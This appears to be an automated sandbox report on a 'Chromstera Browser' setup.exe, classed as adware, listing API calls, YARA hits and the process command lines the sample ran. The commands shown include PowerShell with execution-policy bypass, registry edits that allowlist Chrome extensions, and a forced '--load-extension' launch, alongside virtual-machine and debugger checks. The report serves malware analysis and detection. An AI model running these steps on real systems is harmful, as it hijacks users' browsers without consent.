                      Source: Chromnius-Main.msi.0.drBinary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
                      Source: setup.exe, 00000000.00000003.1717180600.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2318609017.0000000003C48000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1716043563.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2315981321.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2315981321.0000000003C34000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1716752934.0000000003C34000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1716107883.0000000003C34000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2950811830.0000000003C49000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2317680666.0000000003C73000.00000004.00000020.00020000.00000000.sdmp, ChromsteraUpdater.exe, 00000008.00000002.1810981504.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, ChromsteraUpdater.exe, 00000008.00000002.1810981504.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: powershell.exe, 00000006.00000002.1833673011.000002526E2D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D7F583 IsDebuggerPresent,OutputDebugStringW,0_2_00D7F583
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D00370 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,FlushFileBuffers,WriteFile,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,OutputDebugStringW,WriteFile,WriteFile,FlushFileBuffers,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,0_2_00D00370
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CCF120 LoadLibraryW,GetProcAddress,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,FreeLibrary,0_2_00CCF120
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D9A090 mov eax, dword ptr fs:[00000030h]0_2_00D9A090
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D9A04C mov eax, dword ptr fs:[00000030h]0_2_00D9A04C
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D8B54A mov ecx, dword ptr fs:[00000030h]0_2_00D8B54A
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D7F896 mov esi, dword ptr fs:[00000030h]0_2_00D7F896
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00D9A090 mov eax, dword ptr fs:[00000030h]3_2_00D9A090
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00D9A04C mov eax, dword ptr fs:[00000030h]3_2_00D9A04C
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00D8B54A mov ecx, dword ptr fs:[00000030h]3_2_00D8B54A
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00D7F896 mov esi, dword ptr fs:[00000030h]3_2_00D7F896
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_001501C9 mov esi, dword ptr fs:[00000030h]8_2_001501C9
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0018252D mov eax, dword ptr fs:[00000030h]8_2_0018252D
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_00178DA0 mov ecx, dword ptr fs:[00000030h]8_2_00178DA0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D7F902 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,0_2_00D7F902
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BDC5D0 __set_se_translator,SetUnhandledExceptionFilter,0_2_00BDC5D0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D80424 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D80424
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D84FE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D84FE3
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BDEF30 __set_se_translator,SetUnhandledExceptionFilter,0_2_00BDEF30
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00D80424 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00D80424
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BDC5D0 __set_se_translator,SetUnhandledExceptionFilter,3_2_00BDC5D0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00D84FE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00D84FE3
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BDEF30 __set_se_translator,SetUnhandledExceptionFilter,3_2_00BDEF30
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_00168138 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00168138
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_001682CB SetUnhandledExceptionFilter,8_2_001682CB
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0016C5B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0016C5B3
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0016784D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0016784D
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0C906C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF77C0C906C
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0C9924 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF77C0C9924
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0C9B0C SetUnhandledExceptionFilter,16_2_00007FF77C0C9B0C
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0CF478 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF77C0CF478
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A478906C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,54_2_00007FF7A478906C
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4789924 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_00007FF7A4789924
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4789B0C SetUnhandledExceptionFilter,54_2_00007FF7A4789B0C
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A478F478 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_00007FF7A478F478

                      HIPS / PFW / Operating System Protection Evasion

                      Source: Yara matchFile source: setup.exe, type: SAMPLE
                      Source: Yara matchFile source: amsi64_7964.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: setup.exe PID: 7404, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: setup.exe PID: 7728, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7964, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Windows\Installer\6bc77d.msi, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Installer\MSICC46.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi, type: DROPPED
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C096D60 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,EnumWindows,SetWindowPos,WaitForSingleObject,GetExitCodeProcess,GetWindowThreadProcessId,GetWindowLongPtrW,16_2_00007FF77C096D60
                      Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe" /i "C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Chromstera Browser" SECONDSEQUENCE="1" CLIENTPROCESSID="7404" AI_MORE_CMD_LINE=1Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1394.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1332.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1333.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1334.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
                      Source: C:\Windows\Installer\MSI4739.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 5
                      Source: C:\Windows\Installer\MSIFB77.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\edge.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "c:\users\user\desktop\setup.exe" /i "c:\users\user\appdata\roaming\chromstera solutions\chromstera browser 1.0.0.0\install\chromnius-main.msi" ai_euimsi=1 appdir="c:\program files (x86)\chromstera browser" secondsequence="1" clientprocessid="7404" ai_more_cmd_line=1
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\windows\systemtemp\pssd27e.ps1" -propfile "c:\windows\systemtemp\msid25b.txt" -scriptfile "c:\windows\systemtemp\scrd25c.ps1" -scriptargsfile "c:\windows\systemtemp\scrd25d.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pssed0b.ps1" -propfile "c:\users\user\appdata\local\temp\msiecf7.txt" -scriptfile "c:\users\user\appdata\local\temp\screcf8.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\screcf9.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss1394.ps1" -propfile "c:\users\user\appdata\local\temp\msi1332.txt" -scriptfile "c:\users\user\appdata\local\temp\scr1333.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr1334.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
                      Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "c:\users\user\desktop\setup.exe" /i "c:\users\user\appdata\roaming\chromstera solutions\chromstera browser 1.0.0.0\install\chromnius-main.msi" ai_euimsi=1 appdir="c:\program files (x86)\chromstera browser" secondsequence="1" clientprocessid="7404" ai_more_cmd_line=1Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pssed0b.ps1" -propfile "c:\users\user\appdata\local\temp\msiecf7.txt" -scriptfile "c:\users\user\appdata\local\temp\screcf8.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\screcf9.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss1394.ps1" -propfile "c:\users\user\appdata\local\temp\msi1332.txt" -scriptfile "c:\users\user\appdata\local\temp\scr1333.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr1334.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\windows\systemtemp\pssd27e.ps1" -propfile "c:\windows\systemtemp\msid25b.txt" -scriptfile "c:\windows\systemtemp\scrd25c.ps1" -scriptargsfile "c:\windows\systemtemp\scrd25d.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."Jump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: 8_2_0013BCD0 LocalFree,GetLastError,GetLastError,LocalAlloc,GetLastError,LocalFree,LocalFree,GetLastError,LocalFree,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,GetLastError,LocalFree,SetSecurityDescriptorDacl,GetLastError,LocalFree,8_2_0013BCD0
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00CC72E0 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,CloseHandle,0_2_00CC72E0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: 8_2_00167DEC cpuid 8_2_00167DEC
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_00188091
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: GetLocaleInfoW,8_2_00188197
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00188266
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: EnumSystemLocalesW,8_2_0018073A
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: GetLocaleInfoW,8_2_00180CB7
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: GetLocaleInfoEx,8_2_00167283
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: EnumSystemLocalesW,8_2_00187BA4
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: EnumSystemLocalesW,8_2_00187BEF
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: EnumSystemLocalesW,8_2_00187C8A
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00187D15
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: GetLocaleInfoW,GetLocaleInfoW,8_2_000DBE10
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: GetLocaleInfoW,8_2_00187F68
                      Source: C:\Windows\Installer\MSI4739.tmp Code function: GetLocaleInfoEx,FormatMessageA,16_2_00007FF77C0A2530
                      Source: C:\Windows\Installer\MSI4739.tmp Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,16_2_00007FF77C0EB6E0
                      Source: C:\Windows\Installer\MSI4739.tmp Code function: EnumSystemLocalesW,16_2_00007FF77C0E4710
                      Source: C:\Windows\Installer\MSI4739.tmp Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,16_2_00007FF77C0EBF38
                      Source: C:\Windows\Installer\MSI4739.tmp Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,16_2_00007FF77C0EC114
                      Source: C:\Windows\Installer\MSI4739.tmp Code function: EnumSystemLocalesW,16_2_00007FF77C0EBA2C
                      Source: C:\Windows\Installer\MSI4739.tmp Code function: EnumSystemLocalesW,16_2_00007FF77C0EBAFC
                      Source: C:\Windows\Installer\MSI4739.tmp Code function: GetLocaleInfoEx,16_2_00007FF77C0C83A4
                      Source: C:\Windows\Installer\MSI4739.tmp Code function: GetLocaleInfoW,16_2_00007FF77C0E4C54
                      Source: C:\Windows\Installer\MSIFB77.tmp Code function: GetLocaleInfoEx,FormatMessageA,54_2_00007FF7A4762530
                      Source: C:\Windows\Installer\MSIFB77.tmp Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,54_2_00007FF7A47AB6E0
                      Source: C:\Windows\Installer\MSIFB77.tmp Code function: EnumSystemLocalesW,54_2_00007FF7A47A4710
                      Source: C:\Windows\Installer\MSIFB77.tmp Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,54_2_00007FF7A47ABF38
                      Source: C:\Windows\Installer\MSIFB77.tmp Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,54_2_00007FF7A47AC114
                      Source: C:\Windows\Installer\MSIFB77.tmp Code function: EnumSystemLocalesW,54_2_00007FF7A47ABAFC
                      Source: C:\Windows\Installer\MSIFB77.tmp Code function: EnumSystemLocalesW,54_2_00007FF7A47ABA2C
                      Source: C:\Windows\Installer\MSIFB77.tmp Code function: GetLocaleInfoEx,54_2_00007FF7A47883A4
                      Source: C:\Windows\Installer\MSIFB77.tmp Code function: GetLocaleInfoW,54_2_00007FF7A47A4C54
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\sys_min_down.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\sys_min_hot.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\sys_min_normal.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\sys_min_inactive.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_left.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_left_inactive.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_mid.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_mid_inactive.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_caption.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_caption_inactive.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_right.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_right_inactive.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_left.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_left_inactive.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_right.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_right_inactive.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_left.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_left_inactive.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_mid.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_mid_inactive.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_right.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_right_inactive.bmp VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\dialog.jpg VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\banner.jpg VolumeInformation
                      Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00D00290 GetLocalTime,0_2_00D00290
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: 8_2_00181549 GetTimeZoneInformation,8_2_00181549
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00BA7620 GetVersionExW,GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,0_2_00BA7620
                      Source: C:\Users\user\Desktop\setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\setup.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 Blob
                      [MITRE ATT&CK matrix. Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact]
                      [Behavior graph] Behavior Graph ID: 1544057, Sample: setup.exe, Startdate: 28/10/2024, Architecture: WINDOWS, Score: 81

                      Source | Detection | Scanner | Label | Link
                      setup.exe | 42% | ReversingLabs | Win32.Adware.RedCap
